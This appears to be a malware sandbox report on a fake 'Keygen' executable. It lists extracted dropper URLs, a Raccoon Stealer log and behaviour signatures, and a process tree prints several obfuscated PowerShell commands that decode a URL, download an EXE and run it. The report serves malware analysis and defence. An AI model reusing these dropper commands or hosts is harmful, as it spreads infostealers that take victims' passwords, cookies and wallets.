Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    153s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (61) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 04:49:49 GMT Bot_ID: 750D7400-3B08-415E-A8B0-2695D81425F5_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.13 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: UCQFZDUI - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (480 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 2 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 34 IoCs
  • Loads dropped DLL 58 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (61) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (61) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1308
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\E2D0.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (61) — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1516
      • C:\Users\Admin\AppData\Local\Temp\E2D0.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1384
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\E2D0.tmp\m.hta"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1828
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1960
          • C:\Users\Public\yad.exe
            "C:\Users\Public\yad.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2484
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2668
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2832
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2832 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\256352072257505\\* & exit
                  8⤵
                    PID:3000
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 2832
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1844
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2732
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2920
              • C:\Users\Public\yad.exe
                "C:\Users\Public\yad.exe"
                6⤵
                • Executes dropped EXE
                PID:2936
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\E2D0.tmp\m1.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1776
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1968
        • C:\Windows\SysWOW64\timeout.exe
          timeout 1
          3⤵
          • Delays execution with timeout.exe
          PID:1788
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\E2D0.tmp\b.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1032
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1888
            • C:\Users\Public\dgt.exe
              "C:\Users\Public\dgt.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2412
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                6⤵
                • Loads dropped DLL
                PID:2480
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                  "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2364
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                    8⤵
                    • Loads dropped DLL
                    PID:2196
                    • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                      9⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1860
